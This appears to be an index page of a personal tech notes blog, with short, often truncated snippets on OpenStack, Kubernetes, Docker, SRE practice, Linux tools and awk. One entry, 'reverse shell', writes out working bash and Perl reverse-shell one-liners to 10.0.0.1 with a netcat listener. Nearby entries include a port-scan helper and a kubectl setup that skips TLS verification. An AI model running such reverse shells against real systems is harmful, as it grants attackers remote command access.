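For readers without netcat at hand, the port scan above (nc -z) can be approximated with a plain TCP connect loop. This is a minimal sketch, not a replacement for nc: the function name scan and the one-second timeout are assumptions, and it checks TCP ports only.

```python
import socket


def scan(host, ports, timeout=1.0):
    """Return the ports on host that accept a TCP connection.

    Mirrors the idea of `nc -z`: connect, send nothing, close.
    """
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            sock.settimeout(timeout)
            # connect_ex returns 0 on success instead of raising
            if sock.connect_ex((host, port)) == 0:
                open_ports.append(port)
    return open_ports
```

Calling scan("172.31.100.7", range(21, 26)) would cover the same port range as the nc example; only scan hosts you are allowed to probe.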

Microservice Infrastructure

Microservices Infrastructure: a modern platform for rapidly deploying globally distributed services, provided by Cisco. https://github.com/CiscoCloud/microservices-infrastructure

Features: the ability to deploy applications utilizing resources across multiple datacenters (and even clouds), deploying in a decentralized control model, supporting intelligent endpoints, heavy automation, and the on-demand nature of deploying these services to support business requirements and scale.

Architectural Overview:
    Mesos cluster manager for efficient resource isolation and sharing across distributed services
    Marathon for cluster management of long-running containerized services
    Consul for service discovery (by using Consul’s built-in DNS server)
    Docker container runtime supported by Marathon
    Multi-datacenter support
    High availability

Single Data Center Architecture: The base platform contains control nodes that manage the cluster and any number of compute nodes.

Mininet links

Introduction to Mininet: http://mininet.org/walkthrough/
OpenFlow Tutorial: https://github.com/mininet/openflow-tutorial/wiki
Mininet walkthrough: http://mininet.org/walkthrough/
RYU SDN Framework: http://osrg.github.io/ryu-book/en/html/
A good ryu blog: http://linton.tw/

Neutron Layer 3 High Availability

L3 Agent Low Availability Today, you can utilize multiple network nodes to achieve load sharing, but not high availability or redundancy. Assuming three network nodes, creation of new routers will be scheduled and distributed amongst those three nodes. However, if a node drops, all routers on that node will cease to exist as well as any traffic normally forwarded by those routers. Neutron, in the Icehouse release, doesn’t support any built-in solution.

OVS 2.0 call flow

Refer to http://blog.csdn.net/night_elf_1020/article/details/37600791

Open vSwitch over DPDK on Ubuntu

There are two approaches to using DPDK acceleration in Open vSwitch. One is the openvswitch fork from Intel, called dpdk-ovs; the other is done directly in openvswitch, with a different approach from Intel's. http://dpdk.org/ml/archives/dev/2014-March/001770.html - https://github.com/01org/dpdk-ovs VirtualBox preparations: To run openvswitch with DPDK I used a virtual machine (VirtualBox) because the NIC I had on my laptop was not supported. I created three virtual NICs for my vm, one behind NAT

Introduction to the OpenStack Magnum community and project

Add network management for native docker https://blueprints.launchpad.net/magnum/+spec/native-docker-network https://etherpad.openstack.org/p/magnum-native-docker-network From http://dockone.io/article/445

Perform Consistent Snapshots with qemu guest agent

A while back, I wrote an article about taking consistent snapshots of your virtual machines in your OpenStack environment. However this method was really intrusive since it required to be inside the virtual machine and to manually summon a filesystem freeze. In this article, I will use a different approach to achieve the same goal without the need to be inside the virtual machine. The only requirement is to have a virtual machine running the qemu-guest-agent.

Pluribus Networks

Pluribus, which has already raised 95 million US dollars, makes a Server Switch product. Its CEO says that it can both overcome the scalability of VMware's products

Programming Resources

Index: ANDROID ANGULAR BOOTSTRAP C# C/C++ CASSANDRA CHROME CLOJURE COUCHDB D DAPPER DEVOPS DOCKER ERLANG FIREFOX GIT GO HADOOP HASKELL HTML5 IOS JAVA JAVASCRIPT LINUX LISP LUA MARKDOWN MATH MEMCACHED MONGODB MYSQL NGINX NODE.JS OPENGL OPENSTACK PERL PHP POSTGRESQL PUPPET PYTHON R RASPBERRY PI REDIS REGEX RUBY RUST SCALA SHELL SPARK STORM SWIFT VARNISH VIM WEB FRONT END WEB SECURITY WOLFRAM OPEN SOURCE

PyWren

PyWren is a Python computing framework built on AWS Lambda that emulates the map/reduce functionality of Python's futures package. It is well suited to machine

Python __file__ not defined problem

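__file__ is defined only when the code runs from a file; in an interactive shell you need a workaround:

    import inspect
    import os
    import sys

    # In an interactive session the main module has no __file__,
    # so fall back to the file name of the current frame.
    if not hasattr(sys.modules[__name__], '__file__'):
        __file__ = inspect.getfile(inspect.currentframe())

    print(os.path.dirname(os.path.abspath(__file__)))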

Raft

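Raft efficiently solves the problem of keeping log contents consistent across the nodes of a distributed system, while also giving the cluster a degree of fault tolerance. Even when some nodes in the cluster fail, the network fails, and so on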

Redhat Atomic Host

Introduction: Red Hat has announced the first public beta of Red Hat Enterprise Linux 7 Atomic Host. The beta is available from Red Hat and on Amazon Web Services and Google Compute Platform. What can you expect from the Red Hat Enterprise Linux 7 Atomic Host Beta? Specifically Designed to Run Containers: Red Hat Enterprise Linux 7 Atomic Host Beta provides a streamlined host platform that is optimized to run application containers.

SELinux

SELinux (Security-Enhanced Linux) is an implementation of mandatory access control. Its approach takes the principle of least privilege as

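SRE guiding principles

Embracing risk: SRE aims to balance the risk between rapid innovation and efficient service operation, rather than simply maximizing service uptime. Managing service availability is mainly about managing risk, and the cost of managing risk can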

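SRE management

Training new hires; joining on-call; small project work; documentation changes; disaster drills; reverse engineering and improvisation; postmortems; changing a real environment and fixing it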

Seccomp

Seccomp is short for secure computing mode. It is a facility provided by the Linux kernel that restricts the system calls a process may execute. Seccomp requires a

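Serverless platforms

AWS Lambda: AWS Lambda is currently the most influential serverless product. It triggers user-defined Lambda functions in response to events and automatically manages the backend servers, high availability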

Open-source serverless frameworks

An introduction to common open-source serverless frameworks. Kubernetes-based serverless frameworks: Fission; Funktion: uses fabric8-maven-plugin to generate

Serverless use cases

Web applications and backends; big data processing; real-time stream processing

Setting up GRE for Kubernetes

First, change Docker's default bridge:
# Stop the Docker daemon process
systemctl stop docker
# Bring the default bridge docker0 down and delete it
ip link set dev docker0 down
brctl delbr docker0
# New

Something about kubernetes authentication

You can enable Kubernetes authentication by following this documentation. Then you happily access kube-apiserver with curl:
# curl -k -N -X GET -H "Authorization: Basic XXXXXXXXXX" http://localhost:8080/api/v1/namespaces/default/pods
{ "kind": "PodList", "apiVersion": "v1", "metadata": { "selfLink": "/api/v1/namespaces/default/pods", "resourceVersion": "74034" }, "items": [] }
Nothing blocks this request! What is wrong? Wait a moment and check the Kubernetes documentation, where I find this: The Kubernetes API is served by the Kubernetes apiserver process.
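The XXXXXXXXXX placeholder in the curl call above stands for an HTTP Basic credential, which by the Basic scheme is the base64 encoding of "username:password". The following is a minimal Python sketch of how such a header could be built. The function name basic_auth_header and the sample credentials are illustrative assumptions, not part of the original post.

```python
import base64


def basic_auth_header(username: str, password: str) -> dict:
    """Build an HTTP Basic Authorization header (hypothetical helper).

    The Basic scheme sends base64("username:password"); this is an
    encoding, not encryption, so it should only travel over TLS.
    """
    raw = f"{username}:{password}".encode("utf-8")
    token = base64.b64encode(raw).decode("ascii")
    return {"Authorization": f"Basic {token}"}


if __name__ == "__main__":
    # Sample credentials are placeholders for illustration only.
    print(basic_auth_header("username", "password"))
```

The resulting dictionary can be passed as request headers by any HTTP client.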

Stateless Floating IPs

Floating IPs in Neutron are currently implemented with iptables NAT, which uses ip_conntrack to track every connection (5-tuple),

TiDB

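TiDB is an open-source distributed NewSQL database that PingCAP built based on the Google Spanner / F1 papers. TiDB has the following core NewSQL features: SQL support (TiDB is MySQL compatible); horizontal, linear, elastic scaling; distributed transactions; cross-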

Use kubectl to connect to a Kubernetes cluster

kubectl is the main tool for interacting with a Kubernetes cluster. By default it connects to http://localhost:8080 with no authentication. But how can we use kubectl with authentication? It is pretty simple: configure kubectl with a dedicated cluster:
kubectl config set-credentials default --username=username --password=password
kubectl config set-cluster default --server=https://kubernetes-master:6443 --insecure-skip-tls-verify=true
kubectl config set-context default --cluster=default --user=default
kubectl config use-context default

Using cAdvisor to monitor docker

cAdvisor (Container Advisor) provides container users an understanding of the resource usage and performance characteristics of their running containers. It is a running daemon that collects, aggregates, processes, and exports information about running containers. Specifically, for each container it keeps resource isolation parameters, historical resource usage, histograms of complete historical resource usage and network statistics. This data is exported by container and machine-wide. cAdvisor has native support for Docker containers and should support just about any other container type out of the box.

Weekly reading list (20150607)

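OpenStack Magnum http://www.csdn.net/article/2015-06-02/2824827 Magnum is a new project started after last year's Paris summit, dedicated to providing container services to users. Its latest architecture is shown in Figure 2. Since last November, on StackFor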

Weekly reading list (20150626)

The hottest topic this week was DockerCon, so many items in the list are Docker-related. Open Container Project (OCP): Today we’re pleased to announce that CoreOS, Docker, and a large group of industry leaders are working together on a standard container format through the formation

Zookeeper

awesome quick start

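awesome is an excellent window manager for Linux, with advantages such as speed and a clean interface. Installation is also fairly simple:
sudo apt-get install -y awesome awesome-extra gnome-settings-daemon nautilus
sudo apt-get install -y --no-install-recommends gnome-session
mkdir -p ~/.config/awesome
Common keyboard shortcuts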

awk examples

Precede each line with its line number: awk '{print NR, $0}' filename
Replace the first field with the line number: awk '{$1=NR; print}' filename
Print field 1 and field 2: awk '{print $1,$2}' filename
Print the last field: awk '{print $NF}' filename
Print non-empty lines: awk 'NF>0{print $0}' filename
Print lines with more than 4 fields: awk 'NF>4{print $0}' filename
Print matching lines (egrep): awk '/test.
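For readers more at home in Python, here is a rough sketch of what three of the awk one-liners above do: numbering lines, printing the last field, and keeping non-empty lines. The function names are illustrative assumptions. Fields are split on runs of whitespace, which mirrors awk's default field splitting only approximately.

```python
def number_lines(lines):
    """Roughly awk '{print NR, $0}': prefix each line with its 1-based number."""
    return [f"{nr} {line}" for nr, line in enumerate(lines, start=1)]


def last_field(lines):
    """Roughly awk '{print $NF}': last whitespace-separated field of each line.

    A line with no fields yields an empty string.
    """
    result = []
    for line in lines:
        fields = line.split()
        result.append(fields[-1] if fields else "")
    return result


def non_empty(lines):
    """Roughly awk 'NF>0{print $0}': keep lines that have at least one field."""
    return [line for line in lines if line.split()]


if __name__ == "__main__":
    sample = ["alpha beta gamma", "", "one two"]
    print(number_lines(sample))
    print(last_field(sample))
    print(non_empty(sample))
```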

bigdata

Awesome Big Data A curated list of awesome big data frameworks, resources and other awesomeness. Inspired by awesome-php, awesome-python, awesome-ruby, hadoopecosystemtable & big-data. Your contributions are always welcome! Awesome Big Data Frameworks Distributed Programming Distributed Filesystem Key-Map Data Model Document Data Model Key-value Data Model Graph Data Model NewSQL Databases Columnar Databases Time-Series Databases SQL-like processing Integrated Development Environments Data Ingestion Service Programming Scheduling Machine Learning Benchmarking Security System Deployment Applications Search engine and framework MySQL forks and evolutions PostgreSQL forks and evolutions Memcached forks and evolutions Embedded Databases Business Intelligence Data Visualization Internet of things and sensor data Interesting Readings Interesting Papers Other Awesome Lists Frameworks Apache Hadoop - framework for distributed processing.

cannot change locale

Run the locale command:
LANG=
LANGUAGE=
LC_CTYPE="POSIX"
LC_NUMERIC="POSIX"
LC_TIME="POSIX"
LC_COLLATE="POSIX"
LC_MONETARY="POSIX"
LC_MESSAGES="POSIX"
LC_PAPER="POSIX"
LC_NAME="POSIX"
LC_ADDRESS="POSIX"
LC_TELEPHONE="POSIX"
LC_MEASUREMENT="POSIX"
LC_IDENTIFICATION="POSIX"
LC_ALL=
Edit the profile: vi /etc/profile
Add the following line: export LC_ALL=en_US.UTF-8
Reload it: source /etc/profile
This produces the error: setlocale: LC_ALL: cannot change locale (en_US.UTF-8): No such file or directory
Run dpkg-reconfigure

cri-o

cri-o brings a native OCI runtime (currently only runc is supported) to Kubernetes, based on the Kubelet Container Runtime Interface (CRI). cri-o is still under

docker in tencent

Docker is widely used inside Tencent. Its Yarn-based scheduling platform, code-named Gaia, supports both Docker and non-Docker applications and provides high

docker internal

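docker-base Abstract: Building on existing documentation, this article summarizes the following points: an introduction to Docker, including its origins and applicable scenarios; the set of technologies behind Docker (namespace, cgroup, lxc, aufs, and so on); Docker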

docker networking

See CNM (Container Networking Model).

gRPC

gRPC is an open-source, high-performance RPC framework based on HTTP/2. It uses the Protocol Buffers serialization protocol and supports Java, Go, C++, Python,

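How to amend the previous commit with git commit

Method 1: use the --amend option.
# Make the changes that are needed.
git add .
git commit --amend
Note: this approach conveniently preserves the original Change-Id and is recommended.
Method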

nas

NAS (Network-Attached Storage) is file-level computer data storage connected to a computer network. It can provide data to different clients

net-ns

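Introduction: Network namespaces were introduced into the Linux protocol stack to support multiple instances of the network stack, and the isolation between these stacks is implemented by namespaces (somewhat like a process's linear address space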

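On-call rotation

On-call rotation is an important responsibility of the operations team. Its goal is to safeguard the reliability and availability of services. Balancing on-call work: balance in quantity: at least 50% of the time is spent on software engineering, and the remaining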

perf

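Introduction: perf is the performance analysis tool that ships with the Linux kernel. With it, applications can use the PMU, tracepoints, and special counters in the kernel to collect performance statistics. It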

reverse shell

Listen on port 8080 first: nc -l -p 8080 -vvv
Bash: Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10): bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
Perl: Here’s a shorter, feature-free version of the perl-reverse-shell: perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' There’s also an alternative Perl reverse shell here.
Python: This was tested under Linux / Python 2.7: python -c 'import socket,subprocess,os;s=socket.

runV

runV is an implementation of the Open Container Initiative (OCI) standard (other implementations include runc and clear container). Unlike runc, runV is a virtualization-based OC

runc

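runc is an implementation of the Open Container Initiative (OCI) standard (other implementations include runv and clear container), and it is also the default backend Docker uses to manage containers. The OCI standard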

screen tips

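Introduction: Screen is a window manager that multiplexes one physical terminal among multiple processes. Screen has the concept of sessions: within a single screen session, a user can create multiple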

spanner

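Spanner is a cross-region, cross-datacenter distributed relational database offered by Google. It provides transactional consistency together with very strong scalability, combining traditional relational databases and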

sysdig

Sysdig captures system calls and other system level events using a linux kernel facility called tracepoints, providing a rich set of real-time, system-level information. Sysdig “packetizes” this information, so that you can do things like save it into trace files and easily filter it, a bit like you would do with tcpdump. This makes it very flexible to explore what processes are doing. Sysdig instruments your physical and virtual machines at the OS level by installing into the Linux kernel and capturing system calls and other OS events.

systemtap

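SystemTap is a Linux counterpart to DTrace. It converts user-supplied scripts into kernel modules and runs them to monitor and trace kernel events. Installation: note that newer kernels do not support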

vagrant

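Vagrant, a simple virtual machine management tool. Introduction to Vagrant: Vagrant is a cross-platform virtual machine management tool that can package cross-platform development environments and distribute them to team members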

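Consistency

Approaches to consistency: Exclusive lock: poor performance. Read-write lock: reads can run concurrently, but nothing can read during a write and nothing can write during a read. Copy on write: reads and writes do not affect each other, so it is more efficient. If someone is in a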
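To illustrate the copy-on-write idea from the list above, here is a minimal Python sketch under stated assumptions: the class name CopyOnWriteList is hypothetical, and the lock-free read path relies on a reference swap being atomic (which holds in CPython). Readers take the current immutable snapshot without locking. Writers build a new copy and swap the reference, so existing snapshots are never modified.

```python
import threading


class CopyOnWriteList:
    """Illustrative copy-on-write container (hypothetical, not from the post)."""

    def __init__(self, items=()):
        self._items = tuple(items)            # immutable snapshot shared with readers
        self._write_lock = threading.Lock()   # serializes writers only

    def snapshot(self):
        # Readers never take the lock: they just read the current reference.
        return self._items

    def append(self, value):
        with self._write_lock:
            # Build a new tuple, then swap the reference in one assignment.
            # Snapshots handed out earlier remain unchanged.
            self._items = self._items + (value,)


if __name__ == "__main__":
    cow = CopyOnWriteList([1, 2])
    before = cow.snapshot()
    cow.append(3)
    print(before, cow.snapshot())
```

The trade-off is that every write copies the whole collection, so the approach fits read-heavy workloads best.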

Cloud native frameworks

API: Google API Design Guide; OpenAPI; Swagger; KONG; Tyk; gRPC - A high performance, open source, general-purpose RPC framework; Finagle - A fault tolerant, protocol-agnostic RPC system
Documentation: Google Developer Documentation Style Guide; OpenAPI; GitBook; Daux.io

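Building JD.com's container cluster

Born from zero: In early 2013, JD.com's R&D organization began investing in virtualization technology. Back then we started from zero, setting out as a small team of a few people. In the physical machine era, the average wait for a physical machine to be allocated before an application could go live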

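Managing a Docker cluster with Mesos

Introduction: Apache Mesos can run multiple types of distributed systems on the same cluster machines, sharing resources more dynamically and efficiently. It provides failure detection, task launching, task tracking, task monitoring, low-level resource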

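Improving reliability with distributed consensus

The CAP theorem states that a distributed system can satisfy at most two of the following three properties: data consistency (C), meaning all nodes access the same, most recent copy of the data; high availability for data updates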

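Distributed scheduled jobs

The goal of a scheduled job is to start tasks periodically at a specified time or interval. On Linux, crontab is commonly used to manage scheduled jobs. Scheduled jobs and idempotency: scheduled jobs periodically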

Availability and scalability

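Reliable releases

Launch coordination engineers: review new products and internal services to ensure they meet reliability standards and best practices; own all technical issues during the launch process, acting as its "gatekeeper"; train developers in best practices; establish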

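Recommended books

Most-recommended books. Technical books: Hackers & Painters: Big Ideas from the Computer Age; The Beauty of Mathematics (数学之美); The Art of Multiprocessor Programming (revised edition); High Performance MySQL (3rd edition); Go Web Programming (Go Web编程); MacTal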

Container resource list

Awesome Docker; Awesome Kubernetes; Kubernetes Handbook
Scheduling and orchestration: Kubernetes; Mesosphere DC/OS; SwarmKit; Tectonic; Rancher; Platform9; Kitematic; Deis; OpenShift
Image management: DockerHub; Quay

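Common Windows 10 keyboard shortcuts

Windows Key + Ctrl + D: create a new virtual desktop. Windows Key + Ctrl + Left/Right arrow: switch virtual desktops. Windows Key + Ctrl + F4: close the virtual desktop. Three-finger swipe down (Windows Key + D or M): minimize all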

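Troubleshooting

Troubleshooting can be defined as a repeated "hypothesize and eliminate" process. Common pitfalls: focusing on the wrong system symptoms; failing to change the system configuration or runtime environment correctly; prematurely attributing the problem to highly unlikely factors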

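Data processing pipelines

A data processing pipeline is similar to a UNIX pipe: a program reads input, processes it, and finally outputs new data, and several programs chained together form a pipeline.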

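Data integrity

Data integrity means both service availability and data accessibility; neither can be missing. Data loss failures: incidents that cause data loss can be classified by three factors into 24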

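Architecture Is the Future

Notes on "Architecture Is the Future" (架构即未来). Speaker: Chen Bin, CTO of 易宝支付有限公司 (Yeepay). For an internet company to succeed, besides having an advantage in its business model, it also needs to build a continuously improving virtuous cycle in technology management. This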

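Testing

Testing is a means of demonstrating that certain areas of a system are equivalent before and after a change. The amount of testing depends directly on the system's reliability requirements. Software testing falls into two broad categories, traditional testing and production testing. Traditional testing is used to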

Message queues

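Monitoring and alerting

Monitoring a large-scale system is very challenging: there are many components and the analysis is complex, yet the monitoring system itself must require very little maintenance. In a large-scale deployment, alerts for any single-machine problem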

Network partitions

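Load balancing

Load balancing generally spans several layers and is applied in multiple stages: global server load balancing (GSLB): DNS load balancing based on geographic location; load balancing at the user service level; RPC load balancing. DNS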

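Avoiding cascading failures

A cascading failure is a failure that keeps growing in scale because of a positive feedback loop. It is also known as the avalanche effect. Causes of failure: server overload (when a cluster fails, the load balancer or orchestration system can make the overload worse); resource exhaustion; C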

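Alibaba Cloud RDS

However, the data volumes of those RDS users also keep growing, and a cloud service provider cannot simply watch these RDS users leave, or start maintaining their own database clusters, once their data grows large. Therefore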

Appendix

Availability timetable (maximum downtime allowed per period)
Availability   Per year   Per month   Per day    Per hour
90%            36.5d      3d          2.4h       6min
95%            18.25d     1.5d        1.2h       3min
99%            3.65d      7.2h        14.4min    36s
99.9%          8.76h      43.2min     1.44min    3.6s
99.99%         52.6min    4.32min     8.64s      0.36s
99.999%        5.26min    25.9s       0.86s      0.04s
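The figures in the availability timetable follow from one formula: allowed downtime = period length × (1 − availability). The Python sketch below reproduces that arithmetic. It assumes a 365-day year and a 30-day month, which is what the table's values imply, and the names PERIOD_SECONDS and allowed_downtime_seconds are illustrative.

```python
# Period lengths in seconds, assuming a 365-day year and a 30-day month.
PERIOD_SECONDS = {
    "year": 365 * 24 * 3600,
    "month": 30 * 24 * 3600,
    "day": 24 * 3600,
    "hour": 3600,
}


def allowed_downtime_seconds(availability_percent: float, period: str) -> float:
    """Maximum downtime (in seconds) per period for a given availability target."""
    unavailable_fraction = (100.0 - availability_percent) / 100.0
    return PERIOD_SECONDS[period] * unavailable_fraction


if __name__ == "__main__":
    for target in (90, 95, 99, 99.9, 99.99, 99.999):
        row = {p: round(allowed_downtime_seconds(target, p), 3) for p in PERIOD_SECONDS}
        print(target, row)
```

For example, a 99.9% target allows about 8.76 hours of downtime per year, and a 95% target allows 1.5 days per 30-day month.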